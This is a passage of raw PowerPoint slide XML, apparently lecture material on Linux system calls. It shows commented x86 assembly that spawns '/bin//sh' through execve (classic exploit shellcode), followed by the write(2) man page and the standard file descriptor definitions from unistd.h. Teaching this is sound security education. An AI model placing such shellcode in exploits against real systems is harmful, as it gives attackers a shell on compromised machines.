              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; push some nulls for string termination.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push 0x68732f2f   ; push "//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" to the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push 0x6e69622f   ; push "/bin" to the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Put the address of "/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> via esp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; push 32-bit null terminator to stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; This is an empty array for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; push string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to stack above null terminator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; This is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> array with string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", ["/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", NULL], [NULL])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29465510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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manual page for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the write system call </a:t>
            </a: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smtClean="0"/>
              <a:t>Write system call</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="3536866"/>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400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WRITE(2)            Linux Programmer's Manual            WRITE(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       write - write to a file descriptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYNOPSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssize_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> void *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       write  writes  up to count bytes to the file referenced by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       the file descriptor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> from the buffer  starting  at  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       POSIX  requires that a read() which can be proved to occur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       after a write() has returned returns the new  data.   Note</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       that not all file systems are POSIX conforming. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5311031"/>
            <a:ext cx="7467600" cy="1013098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the following command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/man 2 write</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42376427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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtained from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a: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smtClean="0"/>
              <a:t>Standard file descriptors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="951543"/>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400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Standard file descriptors.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define STDIN_FILENO    0       /* Standard input.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define STDOUT_FILENO   1       /* Standard output.  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define STDERR_FILENO   2       /* Standard error output.  */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2780928"/>
            <a:ext cx="7571184" cy="782265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
